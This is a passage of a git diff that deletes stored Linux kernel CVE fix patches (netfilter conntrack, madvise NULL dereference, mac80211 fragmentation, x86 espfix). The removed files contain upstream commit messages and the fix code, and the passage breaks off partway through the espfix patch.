--A FORWARD -p tcp --dport 80 -j ACCEPT
--A FORWARD -p tcp -m conntrack -m state ESTABLISHED,RELATED -j ACCEPT
-
-One would assume that this allows SCTP on port 9 and TCP on port 80.
-Unfortunately, if the SCTP conntrack module is not loaded, this allows
-*all* SCTP communication, to pass though, i.e. -p sctp -j ACCEPT,
-which we think is a security issue.
-
-This is because on the first SCTP packet on port 9, we create a dummy
-"generic l4" conntrack entry without any port information (since
-conntrack doesn't know how to extract this information).
-
-All subsequent packets that are unknown will then be in established
-state since they will fallback to proto_generic and will match the
-'generic' entry.
-
-Our originally proposed version [1] completely disabled generic protocol
-tracking, but Jozsef suggests to not track protocols for which a more
-suitable helper is available, hence we now mitigate the issue for in
-tree known ct protocol helpers only, so that at least NAT and direction
-information will still be preserved for others.
-
- [1] http://www.spinics.net/lists/netfilter-devel/msg33430.html
-
-Joint work with Daniel Borkmann.
-
-Signed-off-by: Florian Westphal <fw@strlen.de>
-Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
-Acked-by: Jozsef Kadlecsik <kadlec@blackhole.kfki.hu>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
-[bwh: Backported to 3.2: adjust context]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- net/netfilter/nf_conntrack_proto_generic.c | 26 +++++++++++++++++++++++++-
- 1 file changed, 25 insertions(+), 1 deletion(-)
-
-diff --git a/net/netfilter/nf_conntrack_proto_generic.c b/net/netfilter/nf_conntrack_proto_generic.c
-index e2091d0..53bf12a 100644
---- a/net/netfilter/nf_conntrack_proto_generic.c
-+++ b/net/netfilter/nf_conntrack_proto_generic.c
-@@ -14,6 +14,30 @@
- 
- static unsigned int nf_ct_generic_timeout __read_mostly = 600*HZ;
- 
-+static bool nf_generic_should_process(u8 proto)
-+{
-+	switch (proto) {
-+#ifdef CONFIG_NF_CT_PROTO_SCTP_MODULE
-+	case IPPROTO_SCTP:
-+		return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_DCCP_MODULE
-+	case IPPROTO_DCCP:
-+		return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_GRE_MODULE
-+	case IPPROTO_GRE:
-+		return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_UDPLITE_MODULE
-+	case IPPROTO_UDPLITE:
-+		return false;
-+#endif
-+	default:
-+		return true;
-+	}
-+}
-+
- static bool generic_pkt_to_tuple(const struct sk_buff *skb,
- 				 unsigned int dataoff,
- 				 struct nf_conntrack_tuple *tuple)
-@@ -56,7 +80,7 @@ static int packet(struct nf_conn *ct,
- static bool new(struct nf_conn *ct, const struct sk_buff *skb,
- 		unsigned int dataoff)
- {
--	return true;
-+	return nf_generic_should_process(nf_ct_protonum(ct));
- }
- 
- #ifdef CONFIG_SYSCTL
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-8160/^3.18/0002.patch b/Patches/Linux_CVEs/CVE-2014-8160/^3.18/0002.patch
deleted file mode 100644
index a3d330d7..00000000
--- a/Patches/Linux_CVEs/CVE-2014-8160/^3.18/0002.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From db29a9508a9246e77087c5531e45b2c88ec6988b Mon Sep 17 00:00:00 2001
-From: Florian Westphal <fw@strlen.de>
-Date: Fri, 26 Sep 2014 11:35:42 +0200
-Subject: [PATCH] netfilter: conntrack: disable generic tracking for known
- protocols
-
-Given following iptables ruleset:
-
--P FORWARD DROP
--A FORWARD -m sctp --dport 9 -j ACCEPT
--A FORWARD -p tcp --dport 80 -j ACCEPT
--A FORWARD -p tcp -m conntrack -m state ESTABLISHED,RELATED -j ACCEPT
-
-One would assume that this allows SCTP on port 9 and TCP on port 80.
-Unfortunately, if the SCTP conntrack module is not loaded, this allows
-*all* SCTP communication, to pass though, i.e. -p sctp -j ACCEPT,
-which we think is a security issue.
-
-This is because on the first SCTP packet on port 9, we create a dummy
-"generic l4" conntrack entry without any port information (since
-conntrack doesn't know how to extract this information).
-
-All subsequent packets that are unknown will then be in established
-state since they will fallback to proto_generic and will match the
-'generic' entry.
-
-Our originally proposed version [1] completely disabled generic protocol
-tracking, but Jozsef suggests to not track protocols for which a more
-suitable helper is available, hence we now mitigate the issue for in
-tree known ct protocol helpers only, so that at least NAT and direction
-information will still be preserved for others.
-
- [1] http://www.spinics.net/lists/netfilter-devel/msg33430.html
-
-Joint work with Daniel Borkmann.
-
-Signed-off-by: Florian Westphal <fw@strlen.de>
-Signed-off-by: Daniel Borkmann <dborkman@redhat.com>
-Acked-by: Jozsef Kadlecsik <kadlec@blackhole.kfki.hu>
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- net/netfilter/nf_conntrack_proto_generic.c | 26 +++++++++++++++++++++++++-
- 1 file changed, 25 insertions(+), 1 deletion(-)
-
-diff --git a/net/netfilter/nf_conntrack_proto_generic.c b/net/netfilter/nf_conntrack_proto_generic.c
-index d25f293776482..957c1db666525 100644
---- a/net/netfilter/nf_conntrack_proto_generic.c
-+++ b/net/netfilter/nf_conntrack_proto_generic.c
-@@ -14,6 +14,30 @@
- 
- static unsigned int nf_ct_generic_timeout __read_mostly = 600*HZ;
- 
-+static bool nf_generic_should_process(u8 proto)
-+{
-+	switch (proto) {
-+#ifdef CONFIG_NF_CT_PROTO_SCTP_MODULE
-+	case IPPROTO_SCTP:
-+		return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_DCCP_MODULE
-+	case IPPROTO_DCCP:
-+		return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_GRE_MODULE
-+	case IPPROTO_GRE:
-+		return false;
-+#endif
-+#ifdef CONFIG_NF_CT_PROTO_UDPLITE_MODULE
-+	case IPPROTO_UDPLITE:
-+		return false;
-+#endif
-+	default:
-+		return true;
-+	}
-+}
-+
- static inline struct nf_generic_net *generic_pernet(struct net *net)
- {
- 	return &net->ct.nf_ct_proto.generic;
-@@ -67,7 +91,7 @@ static int generic_packet(struct nf_conn *ct,
- static bool generic_new(struct nf_conn *ct, const struct sk_buff *skb,
- 			unsigned int dataoff, unsigned int *timeouts)
- {
--	return true;
-+	return nf_generic_should_process(nf_ct_protonum(ct));
- }
- 
- #if IS_ENABLED(CONFIG_NF_CT_NETLINK_TIMEOUT)
diff --git a/Patches/Linux_CVEs/CVE-2014-8173/3.9-^3.12/0001.patch b/Patches/Linux_CVEs/CVE-2014-8173/3.9-^3.12/0001.patch
deleted file mode 100644
index 07aa158e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-8173/3.9-^3.12/0001.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From ee53664bda169f519ce3c6a22d378f0b946c8178 Mon Sep 17 00:00:00 2001
-From: "Kirill A. Shutemov" <kirill.shutemov@linux.intel.com>
-Date: Fri, 20 Dec 2013 15:10:03 +0200
-Subject: [PATCH] mm: Fix NULL pointer dereference in madvise(MADV_WILLNEED)
- support
-
-Sasha Levin found a NULL pointer dereference that is due to a missing
-page table lock, which in turn is due to the pmd entry in question being
-a transparent huge-table entry.
-
-The code - introduced in commit 1998cc048901 ("mm: make
-madvise(MADV_WILLNEED) support swap file prefetch") - correctly checks
-for this situation using pmd_none_or_trans_huge_or_clear_bad(), but it
-turns out that that function doesn't work correctly.
-
-pmd_none_or_trans_huge_or_clear_bad() expected that pmd_bad() would
-trigger if the transparent hugepage bit was set, but it doesn't do that
-if pmd_numa() is also set. Note that the NUMA bit only gets set on real
-NUMA machines, so people trying to reproduce this on most normal
-development systems would never actually trigger this.
-
-Fix it by removing the very subtle (and subtly incorrect) expectation,
-and instead just checking pmd_trans_huge() explicitly.
-
-Reported-by: Sasha Levin <sasha.levin@oracle.com>
-Acked-by: Andrea Arcangeli <aarcange@redhat.com>
-[ Additionally remove the now stale test for pmd_trans_huge() inside the
-  pmd_bad() case - Linus ]
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- include/asm-generic/pgtable.h | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/include/asm-generic/pgtable.h b/include/asm-generic/pgtable.h
-index b12079afbd5f2..db09234589409 100644
---- a/include/asm-generic/pgtable.h
-+++ b/include/asm-generic/pgtable.h
-@@ -599,11 +599,10 @@ static inline int pmd_none_or_trans_huge_or_clear_bad(pmd_t *pmd)
- #ifdef CONFIG_TRANSPARENT_HUGEPAGE
- 	barrier();
- #endif
--	if (pmd_none(pmdval))
-+	if (pmd_none(pmdval) || pmd_trans_huge(pmdval))
- 		return 1;
- 	if (unlikely(pmd_bad(pmdval))) {
--		if (!pmd_trans_huge(pmdval))
--			pmd_clear_bad(pmd);
-+		pmd_clear_bad(pmd);
- 		return 1;
- 	}
- 	return 0;
diff --git a/Patches/Linux_CVEs/CVE-2014-8709/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-8709/ANY/0001.patch
deleted file mode 100644
index 25f6dfb3..00000000
--- a/Patches/Linux_CVEs/CVE-2014-8709/ANY/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From 338f977f4eb441e69bb9a46eaa0ac715c931a67f Mon Sep 17 00:00:00 2001
-From: Johannes Berg <johannes.berg@intel.com>
-Date: Sat, 1 Feb 2014 00:16:23 +0100
-Subject: mac80211: fix fragmentation code, particularly for encryption
-
-The "new" fragmentation code (since my rewrite almost 5 years ago)
-erroneously sets skb->len rather than using skb_trim() to adjust
-the length of the first fragment after copying out all the others.
-This leaves the skb tail pointer pointing to after where the data
-originally ended, and thus causes the encryption MIC to be written
-at that point, rather than where it belongs: immediately after the
-data.
-
-The impact of this is that if software encryption is done, then
- a) encryption doesn't work for the first fragment, the connection
-    becomes unusable as the first fragment will never be properly
-    verified at the receiver, the MIC is practically guaranteed to
-    be wrong
- b) we leak up to 8 bytes of plaintext (!) of the packet out into
-    the air
-
-This is only mitigated by the fact that many devices are capable
-of doing encryption in hardware, in which case this can't happen
-as the tail pointer is irrelevant in that case. Additionally,
-fragmentation is not used very frequently and would normally have
-to be configured manually.
-
-Fix this by using skb_trim() properly.
-
-Cc: stable@vger.kernel.org
-Fixes: 2de8e0d999b8 ("mac80211: rewrite fragmentation")
-Reported-by: Jouni Malinen <j@w1.fi>
-Signed-off-by: Johannes Berg <johannes.berg@intel.com>
----
- net/mac80211/tx.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
-index 27c990b..97a02d3 100644
---- a/net/mac80211/tx.c
-+++ b/net/mac80211/tx.c
-@@ -878,7 +878,7 @@ static int ieee80211_fragment(struct ieee80211_tx_data *tx,
- 	}
- 
- 	/* adjust first fragment's length */
--	skb->len = hdrlen + per_fragm;
-+	skb_trim(skb, hdrlen + per_fragm);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch
deleted file mode 100644
index 1e7db87b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch
+++ /dev/null
@@ -1,16 +0,0 @@
-diff --git a/arch/x86/kernel/entry_32.S b/arch/x86/kernel/entry_32.S
-index 8f3e2de..41baa1f 100644
---- a/arch/x86/kernel/entry_32.S
-+++ b/arch/x86/kernel/entry_32.S
-@@ -554,11 +554,6 @@
- 
- 	CFI_RESTORE_STATE
- ldt_ss:
--	larl PT_OLDSS(%esp), %eax
--	jnz restore_nocheck
--	testl $0x00400000, %eax		# returning to 32bit stack?
--	jnz restore_nocheck		# allright, normal return
--
- #ifdef CONFIG_PARAVIRT
- 	/*
- 	 * The kernel can't run on a non-flat stack if paravirt mode
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch.base64
deleted file mode 100644
index e00288ed..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2FyY2gveDg2L2tlcm5lbC9lbnRyeV8zMi5TIGIvYXJjaC94ODYva2VybmVsL2VudHJ5XzMyLlMKaW5kZXggOGYzZTJkZS4uNDFiYWExZiAxMDA2NDQKLS0tIGEvYXJjaC94ODYva2VybmVsL2VudHJ5XzMyLlMKKysrIGIvYXJjaC94ODYva2VybmVsL2VudHJ5XzMyLlMKQEAgLTU1NCwxMSArNTU0LDYgQEAKIAogCUNGSV9SRVNUT1JFX1NUQVRFCiBsZHRfc3M6Ci0JbGFybCBQVF9PTERTUyglZXNwKSwgJWVheAotCWpueiByZXN0b3JlX25vY2hlY2sKLQl0ZXN0bCAkMHgwMDQwMDAwMCwgJWVheAkJIyByZXR1cm5pbmcgdG8gMzJiaXQgc3RhY2s/Ci0Jam56IHJlc3RvcmVfbm9jaGVjawkJIyBhbGxyaWdodCwgbm9ybWFsIHJldHVybgotCiAjaWZkZWYgQ09ORklHX1BBUkFWSVJUCiAJLyoKIAkgKiBUaGUga2VybmVsIGNhbid0IHJ1biBvbiBhIG5vbi1mbGF0IHN0YWNrIGlmIHBhcmF2aXJ0IG1vZGUK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch
deleted file mode 100644
index 946704fd..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9322/ANY/0002.patch
+++ /dev/null
@@ -1,519 +0,0 @@
-diff --git a/Documentation/x86/x86_64/mm.txt b/Documentation/x86/x86_64/mm.txt
-index 881582f..bd43704 100644
---- a/Documentation/x86/x86_64/mm.txt
-+++ b/Documentation/x86/x86_64/mm.txt
-@@ -12,6 +12,8 @@
- ffffe90000000000 - ffffe9ffffffffff (=40 bits) hole
- ffffea0000000000 - ffffeaffffffffff (=40 bits) virtual memory map (1TB)
- ... unused hole ...
-+ffffff0000000000 - ffffff7fffffffff (=39 bits) %esp fixup stacks
-+... unused hole ...
- ffffffff80000000 - ffffffffa0000000 (=512 MB)  kernel text mapping, from phys 0
- ffffffffa0000000 - ffffffffff5fffff (=1525 MB) module mapping space
- ffffffffff600000 - ffffffffffdfffff (=8 MB) vsyscalls
-diff --git a/arch/x86/include/asm/pgtable_64_types.h b/arch/x86/include/asm/pgtable_64_types.h
-index 2d88344..b1609f2 100644
---- a/arch/x86/include/asm/pgtable_64_types.h
-+++ b/arch/x86/include/asm/pgtable_64_types.h
-@@ -61,6 +61,8 @@
- #define MODULES_VADDR    _AC(0xffffffffa0000000, UL)
- #define MODULES_END      _AC(0xffffffffff000000, UL)
- #define MODULES_LEN   (MODULES_END - MODULES_VADDR)
-+#define ESPFIX_PGD_ENTRY _AC(-2, UL)
-+#define ESPFIX_BASE_ADDR (ESPFIX_PGD_ENTRY << PGDIR_SHIFT)
- 
- #define EARLY_DYNAMIC_PAGE_TABLES	64
- 
-diff --git a/arch/x86/include/asm/setup.h b/arch/x86/include/asm/setup.h
-index b7bf350..93797d1 100644
---- a/arch/x86/include/asm/setup.h
-+++ b/arch/x86/include/asm/setup.h
-@@ -60,6 +60,9 @@
- static inline void x86_ce4100_early_setup(void) { }
- #endif
- 
-+extern void init_espfix_bsp(void);
-+extern void init_espfix_ap(void);
-+
- #ifndef _SETUP
- 
- /*
-diff --git a/arch/x86/kernel/Makefile b/arch/x86/kernel/Makefile
-index 7bd3bd3..0fde293 100644
---- a/arch/x86/kernel/Makefile
-+++ b/arch/x86/kernel/Makefile
-@@ -27,6 +27,7 @@
- obj-y			+= syscall_$(BITS).o
- obj-$(CONFIG_X86_64)	+= vsyscall_64.o
- obj-$(CONFIG_X86_64)	+= vsyscall_emu_64.o
-+obj-$(CONFIG_X86_64)	+= espfix_64.o
- obj-y			+= bootflag.o e820.o
- obj-y			+= pci-dma.o quirks.o topology.o kdebugfs.o
- obj-y			+= alternative.o i8253.o pci-nommu.o hw_breakpoint.o
-diff --git a/arch/x86/kernel/entry_64.S b/arch/x86/kernel/entry_64.S
-index 7272089..75ccdc1 100644
---- a/arch/x86/kernel/entry_64.S
-+++ b/arch/x86/kernel/entry_64.S
-@@ -58,6 +58,7 @@
- #include <asm/asm.h>
- #include <asm/context_tracking.h>
- #include <asm/smap.h>
-+#include <asm/pgtable_types.h>
- #include <linux/err.h>
- 
- /* Avoid __ASSEMBLER__'ifying <linux/audit.h> just for this.  */
-@@ -1055,8 +1056,16 @@
- 	RESTORE_ARGS 1,8,1
- 
- irq_return:
-+	/*
-+	 * Are we returning to a stack segment from the LDT?  Note: in
-+	 * 64-bit mode SS:RSP on the exception stack is always valid.
-+	 */
-+	testb $4,(SS-RIP)(%rsp)
-+	jnz irq_return_ldt
-+
-+irq_return_iret:
- 	INTERRUPT_RETURN
--	_ASM_EXTABLE(irq_return, bad_iret)
-+	_ASM_EXTABLE(irq_return_iret, bad_iret)
- 
- #ifdef CONFIG_PARAVIRT
- ENTRY(native_iret)
-@@ -1064,6 +1073,30 @@
- 	_ASM_EXTABLE(native_iret, bad_iret)
- #endif
- 
-+irq_return_ldt:
-+	pushq_cfi %rax
-+	pushq_cfi %rdi
-+	SWAPGS
-+	movq PER_CPU_VAR(espfix_waddr),%rdi
-+	movq %rax,(0*8)(%rdi)	/* RAX */
-+	movq (2*8)(%rsp),%rax	/* RIP */
-+	movq %rax,(1*8)(%rdi)
-+	movq (3*8)(%rsp),%rax	/* CS */
-+	movq %rax,(2*8)(%rdi)
-+	movq (4*8)(%rsp),%rax	/* RFLAGS */
-+	movq %rax,(3*8)(%rdi)
-+	movq (6*8)(%rsp),%rax	/* SS */
-+	movq %rax,(5*8)(%rdi)
-+	movq (5*8)(%rsp),%rax	/* RSP */
-+	movq %rax,(4*8)(%rdi)
-+	andl $0xffff0000,%eax
-+	popq_cfi %rdi
-+	orq PER_CPU_VAR(espfix_stack),%rax
-+	SWAPGS
-+	movq %rax,%rsp
-+	popq_cfi %rax
-+	jmp irq_return_iret
-+
- 	.section .fixup,"ax"
- bad_iret:
- 	/*
-@@ -1127,9 +1160,41 @@
- 	call preempt_schedule_irq
- 	jmp exit_intr
- #endif
--
- 	CFI_ENDPROC
- END(common_interrupt)
-+
-+	/*
-+	 * If IRET takes a fault on the espfix stack, then we
-+	 * end up promoting it to a doublefault.  In that case,
-+	 * modify the stack to make it look like we just entered
-+	 * the #GP handler from user space, similar to bad_iret.
-+	 */
-+	ALIGN
-+__do_double_fault:
-+	XCPT_FRAME 1 RDI+8
-+	movq RSP(%rdi),%rax		/* Trap on the espfix stack? */
-+	sarq $PGDIR_SHIFT,%rax
-+	cmpl $ESPFIX_PGD_ENTRY,%eax
-+	jne do_double_fault		/* No, just deliver the fault */
-+	cmpl $__KERNEL_CS,CS(%rdi)
-+	jne do_double_fault
-+	movq RIP(%rdi),%rax
-+	cmpq $irq_return_iret,%rax
-+#ifdef CONFIG_PARAVIRT
-+	je 1f
-+	cmpq $native_iret,%rax
-+#endif
-+	jne do_double_fault		/* This shouldn't happen... */
-+1:
-+	movq PER_CPU_VAR(kernel_stack),%rax
-+	subq $(6*8-KERNEL_STACK_OFFSET),%rax	/* Reset to original stack */
-+	movq %rax,RSP(%rdi)
-+	movq $0,(%rax)			/* Missing (lost) #GP error code */
-+	movq $general_protection,RIP(%rdi)
-+	retq
-+	CFI_ENDPROC
-+END(__do_double_fault)
-+
- /*
-  * End of kprobes section
-  */
-@@ -1298,7 +1363,7 @@
- zeroentry bounds do_bounds
- zeroentry invalid_op do_invalid_op
- zeroentry device_not_available do_device_not_available
--paranoiderrorentry double_fault do_double_fault
-+paranoiderrorentry double_fault __do_double_fault
- zeroentry coprocessor_segment_overrun do_coprocessor_segment_overrun
- errorentry invalid_TSS do_invalid_TSS
- errorentry segment_not_present do_segment_not_present
-@@ -1585,7 +1650,7 @@
-  */
- error_kernelspace:
- 	incl %ebx
--	leaq irq_return(%rip),%rcx
-+	leaq irq_return_iret(%rip),%rcx
- 	cmpq %rcx,RIP+8(%rsp)
- 	je error_swapgs
- 	movl %ecx,%eax	/* zero extend */
-diff --git a/arch/x86/kernel/espfix_64.c b/arch/x86/kernel/espfix_64.c
-new file mode 100644
-index 0000000..8a64da3
---- /dev/null
-+++ b/arch/x86/kernel/espfix_64.c
-@@ -0,0 +1,208 @@
-+/* ----------------------------------------------------------------------- *
-+ *
-+ *   Copyright 2014 Intel Corporation; author: H. Peter Anvin
-+ *
-+ *   This program is free software; you can redistribute it and/or modify it
-+ *   under the terms and conditions of the GNU General Public License,
-+ *   version 2, as published by the Free Software Foundation.
-+ *
-+ *   This program is distributed in the hope it will be useful, but WITHOUT
-+ *   ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
-+ *   FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
-+ *   more details.
-+ *
-+ * ----------------------------------------------------------------------- */
-+
-+/*
-+ * The IRET instruction, when returning to a 16-bit segment, only
-+ * restores the bottom 16 bits of the user space stack pointer.  This
-+ * causes some 16-bit software to break, but it also leaks kernel state
-+ * to user space.
-+ *
-+ * This works around this by creating percpu "ministacks", each of which
-+ * is mapped 2^16 times 64K apart.  When we detect that the return SS is
-+ * on the LDT, we copy the IRET frame to the ministack and use the
-+ * relevant alias to return to userspace.  The ministacks are mapped
-+ * readonly, so if the IRET fault we promote #GP to #DF which is an IST
-+ * vector and thus has its own stack; we then do the fixup in the #DF
-+ * handler.
-+ *
-+ * This file sets up the ministacks and the related page tables.  The
-+ * actual ministack invocation is in entry_64.S.
-+ */
-+
-+#include <linux/init.h>
-+#include <linux/init_task.h>
-+#include <linux/kernel.h>
-+#include <linux/percpu.h>
-+#include <linux/gfp.h>
-+#include <linux/random.h>
-+#include <asm/pgtable.h>
-+#include <asm/pgalloc.h>
-+#include <asm/setup.h>
-+
-+/*
-+ * Note: we only need 6*8 = 48 bytes for the espfix stack, but round
-+ * it up to a cache line to avoid unnecessary sharing.
-+ */
-+#define ESPFIX_STACK_SIZE	(8*8UL)
-+#define ESPFIX_STACKS_PER_PAGE	(PAGE_SIZE/ESPFIX_STACK_SIZE)
-+
-+/* There is address space for how many espfix pages? */
-+#define ESPFIX_PAGE_SPACE	(1UL << (PGDIR_SHIFT-PAGE_SHIFT-16))
-+
-+#define ESPFIX_MAX_CPUS		(ESPFIX_STACKS_PER_PAGE * ESPFIX_PAGE_SPACE)
-+#if CONFIG_NR_CPUS > ESPFIX_MAX_CPUS
-+# error "Need more than one PGD for the ESPFIX hack"
-+#endif
-+
-+#define PGALLOC_GFP (GFP_KERNEL | __GFP_NOTRACK | __GFP_REPEAT | __GFP_ZERO)
-+
-+/* This contains the *bottom* address of the espfix stack */
-+DEFINE_PER_CPU_READ_MOSTLY(unsigned long, espfix_stack);
-+DEFINE_PER_CPU_READ_MOSTLY(unsigned long, espfix_waddr);
-+
-+/* Initialization mutex - should this be a spinlock? */
-+static DEFINE_MUTEX(espfix_init_mutex);
-+
-+/* Page allocation bitmap - each page serves ESPFIX_STACKS_PER_PAGE CPUs */
-+#define ESPFIX_MAX_PAGES  DIV_ROUND_UP(CONFIG_NR_CPUS, ESPFIX_STACKS_PER_PAGE)
-+static void *espfix_pages[ESPFIX_MAX_PAGES];
-+
-+static __page_aligned_bss pud_t espfix_pud_page[PTRS_PER_PUD]
-+	__aligned(PAGE_SIZE);
-+
-+static unsigned int page_random, slot_random;
-+
-+/*
-+ * This returns the bottom address of the espfix stack for a specific CPU.
-+ * The math allows for a non-power-of-two ESPFIX_STACK_SIZE, in which case
-+ * we have to account for some amount of padding at the end of each page.
-+ */
-+static inline unsigned long espfix_base_addr(unsigned int cpu)
-+{
-+	unsigned long page, slot;
-+	unsigned long addr;
-+
-+	page = (cpu / ESPFIX_STACKS_PER_PAGE) ^ page_random;
-+	slot = (cpu + slot_random) % ESPFIX_STACKS_PER_PAGE;
-+	addr = (page << PAGE_SHIFT) + (slot * ESPFIX_STACK_SIZE);
-+	addr = (addr & 0xffffUL) | ((addr & ~0xffffUL) << 16);
-+	addr += ESPFIX_BASE_ADDR;
-+	return addr;
-+}
-+
-+#define PTE_STRIDE        (65536/PAGE_SIZE)
-+#define ESPFIX_PTE_CLONES (PTRS_PER_PTE/PTE_STRIDE)
-+#define ESPFIX_PMD_CLONES PTRS_PER_PMD
-+#define ESPFIX_PUD_CLONES (65536/(ESPFIX_PTE_CLONES*ESPFIX_PMD_CLONES))
-+
-+#define PGTABLE_PROT	  ((_KERNPG_TABLE & ~_PAGE_RW) | _PAGE_NX)
-+
-+static void init_espfix_random(void)
-+{
-+	unsigned long rand;
-+
-+	/*
-+	 * This is run before the entropy pools are initialized,
-+	 * but this is hopefully better than nothing.
-+	 */
-+	if (!arch_get_random_long(&rand)) {
-+		/* The constant is an arbitrary large prime */
-+		rdtscll(rand);
-+		rand *= 0xc345c6b72fd16123UL;
-+	}
-+
-+	slot_random = rand % ESPFIX_STACKS_PER_PAGE;
-+	page_random = (rand / ESPFIX_STACKS_PER_PAGE)
-+		& (ESPFIX_PAGE_SPACE - 1);
-+}
-+
-+void __init init_espfix_bsp(void)
-+{
-+	pgd_t *pgd_p;
-+	pteval_t ptemask;
-+
-+	ptemask = __supported_pte_mask;
-+
-+	/* Install the espfix pud into the kernel page directory */
-+	pgd_p = &init_level4_pgt[pgd_index(ESPFIX_BASE_ADDR)];
-+	pgd_populate(&init_mm, pgd_p, (pud_t *)espfix_pud_page);
-+
-+	/* Randomize the locations */
-+	init_espfix_random();
-+
-+	/* The rest is the same as for any other processor */
-+	init_espfix_ap();
-+}
-+
-+void init_espfix_ap(void)
-+{
-+	unsigned int cpu, page;
-+	unsigned long addr;
-+	pud_t pud, *pud_p;
-+	pmd_t pmd, *pmd_p;
-+	pte_t pte, *pte_p;
-+	int n;
-+	void *stack_page;
-+	pteval_t ptemask;
-+
-+	/* We only have to do this once... */
-+	if (likely(this_cpu_read(espfix_stack)))
-+		return;		/* Already initialized */
-+
-+	cpu = smp_processor_id();
-+	addr = espfix_base_addr(cpu);
-+	page = cpu/ESPFIX_STACKS_PER_PAGE;
-+
-+	/* Did another CPU already set this up? */
-+	stack_page = ACCESS_ONCE(espfix_pages[page]);
-+	if (likely(stack_page))
-+		goto done;
-+
-+	mutex_lock(&espfix_init_mutex);
-+
-+	/* Did we race on the lock? */
-+	stack_page = ACCESS_ONCE(espfix_pages[page]);
-+	if (stack_page)
-+		goto unlock_done;
-+
-+	ptemask = __supported_pte_mask;
-+
-+	pud_p = &espfix_pud_page[pud_index(addr)];
-+	pud = *pud_p;
-+	if (!pud_present(pud)) {
-+		pmd_p = (pmd_t *)__get_free_page(PGALLOC_GFP);
-+		pud = __pud(__pa(pmd_p) | (PGTABLE_PROT & ptemask));
-+		paravirt_alloc_pud(&init_mm, __pa(pmd_p) >> PAGE_SHIFT);
-+		for (n = 0; n < ESPFIX_PUD_CLONES; n++)
-+			set_pud(&pud_p[n], pud);
-+	}
-+
-+	pmd_p = pmd_offset(&pud, addr);
-+	pmd = *pmd_p;
-+	if (!pmd_present(pmd)) {
-+		pte_p = (pte_t *)__get_free_page(PGALLOC_GFP);
-+		pmd = __pmd(__pa(pte_p) | (PGTABLE_PROT & ptemask));
-+		paravirt_alloc_pmd(&init_mm, __pa(pte_p) >> PAGE_SHIFT);
-+		for (n = 0; n < ESPFIX_PMD_CLONES; n++)
-+			set_pmd(&pmd_p[n], pmd);
-+	}
-+
-+	pte_p = pte_offset_kernel(&pmd, addr);
-+	stack_page = (void *)__get_free_page(GFP_KERNEL);
-+	pte = __pte(__pa(stack_page) | (__PAGE_KERNEL_RO & ptemask));
-+	paravirt_alloc_pte(&init_mm, __pa(stack_page) >> PAGE_SHIFT);
-+	for (n = 0; n < ESPFIX_PTE_CLONES; n++)
-+		set_pte(&pte_p[n*PTE_STRIDE], pte);
-+
-+	/* Job is done for this CPU and any CPU which shares this page */
-+	ACCESS_ONCE(espfix_pages[page]) = stack_page;
-+
-+unlock_done:
-+	mutex_unlock(&espfix_init_mutex);
-+done:
-+	this_cpu_write(espfix_stack, addr);
-+	this_cpu_write(espfix_waddr, (unsigned long)stack_page
-+		       + (addr & ~PAGE_MASK));
-+}
-diff --git a/arch/x86/kernel/smpboot.c b/arch/x86/kernel/smpboot.c
-index bfd348e..9f009cc 100644
---- a/arch/x86/kernel/smpboot.c
-+++ b/arch/x86/kernel/smpboot.c
-@@ -265,6 +265,13 @@
- 	check_tsc_sync_target();
- 
- 	/*
-+	 * Enable the espfix hack for this CPU
-+	 */
-+#ifdef CONFIG_X86_64
-+	init_espfix_ap();
-+#endif
-+
-+	/*
- 	 * We need to hold vector_lock so there the set of online cpus
- 	 * does not change while we are assigning vectors to cpus.  Holding
- 	 * this lock ensures we don't half assign or remove an irq from a cpu.
-diff --git a/arch/x86/mm/dump_pagetables.c b/arch/x86/mm/dump_pagetables.c
-index 0002a3a..e04e677 100644
---- a/arch/x86/mm/dump_pagetables.c
-+++ b/arch/x86/mm/dump_pagetables.c
-@@ -30,11 +30,13 @@
- 	unsigned long start_address;
- 	unsigned long current_address;
- 	const struct addr_marker *marker;
-+	unsigned long lines;
- };
- 
- struct addr_marker {
- 	unsigned long start_address;
- 	const char *name;
-+	unsigned long max_lines;
- };
- 
- /* indices for address_markers; keep sync'd w/ address_markers below */
-@@ -45,6 +47,7 @@
- 	LOW_KERNEL_NR,
- 	VMALLOC_START_NR,
- 	VMEMMAP_START_NR,
-+	ESPFIX_START_NR,
- 	HIGH_KERNEL_NR,
- 	MODULES_VADDR_NR,
- 	MODULES_END_NR,
-@@ -67,6 +70,7 @@
- 	{ PAGE_OFFSET,		"Low Kernel Mapping" },
- 	{ VMALLOC_START,        "vmalloc() Area" },
